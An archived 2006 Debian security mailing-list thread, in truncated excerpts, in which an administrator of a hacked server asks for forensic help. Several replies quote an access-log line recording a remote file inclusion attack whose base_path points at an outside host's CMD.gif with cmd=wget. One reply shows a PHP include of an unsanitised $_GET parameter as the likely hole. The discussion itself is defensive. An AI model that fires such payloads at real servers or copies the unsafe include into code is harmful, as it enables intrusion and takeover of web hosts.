Re: help needed

2006-11-06 Thread Javier Fernández-Sanguino Peña
On Mon, Nov 06, 2006 at 11:19:20AM +0100, Heilig Szabolcs wrote: > Hello! > > >http://jesusch.de/~jesusch/tmp/access.log > > There are many log entries with "something=http://" style > pattern. These are common attack methods against default configured > servers with poorly written applications.

Re: ***DEB*: Re: help needed

2006-11-06 Thread maximilian attems
On Mon, Nov 06, 2006 at 06:21:26PM +0100, Fuzzums wrote: > 213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET > http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget > HTTP/1.0" 403 495 > "http://85.214.18.193

Re: ***DEB*: Re: help needed

2006-11-06 Thread Bjoern Boschman
Hi Fuzzums, Fuzzums wrote: 213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget HTTP/1.0" 403 495 "http://85.214.18.193/manager/media/browser/mcpuk/conne

Re: ***DEB*: Re: help needed

2006-11-06 Thread Fuzzums
213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget HTTP/1.0" 403 495 "http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.p

Re: help needed

2006-11-06 Thread Holger Schletz
Hi, > at that mentioned time someone at least tried to access pages which are > not accessible (index.php?img=1 e.g.) > > there definitely might be a problem in the code: > > if ( $_GET['page'] ) { > include $_GET['page'].'/index.php'; > } > > > could this be the vulnerable code segment?

Re: help needed

2006-11-06 Thread Heilig Szabolcs
Hello! http://jesusch.de/~jesusch/tmp/access.log There are many log entries with "something=http://" style pattern. These are common attack methods against default configured servers with poorly written applications. Many of these rely on register_globals=on php.ini setting. Turn it off first

Re: help needed

2006-11-06 Thread Bjoern Boschman
I've put access.log online with the following cut off: grep -v "Googlebot/2.1" access.log.1| grep -v ^87.106.31.224|grep -v gallery|grep -v "Yahoo! Slurp"|grep -vi svn |grep -v mediawiki |grep -v "favicon.ico" http://jesusch.de/~jesusch/tmp/access.log at that mentioned time someone at l

Re: Register

2006-11-06 Thread Dominic Hargreaves
On Sun, Nov 05, 2006 at 08:27:36PM -0800, John Bugg wrote: > Please register my name for update/upgrade notifications. Thanks in advance. You can do this from http://lists.debian.org/debian-security-announce/ Regards, Dominic. -- Dominic Hargreaves | http://www.larted.org.uk/~dom/ PGP key 5178

Re: help needed

2006-11-06 Thread Arthur de Jong
As I'm not so aware could someone be so kind to help me with a forensic analysis? I also still do not know which program (probably any php-stuff) was/is vulnerable. All I've found so far were these entries in my apache2 error-log. http://jesusch

help needed

2006-11-06 Thread Bjoern Boschman
Hi list, My sarge box was recently hacked by some script kiddy who installed an irc-dcc-fileserver on it :/ As I'm not so aware could someone be so kind to help me with a forensic analysis? I also still do not know which program (probably any php-stuff) was/is vulnerable. All I've found so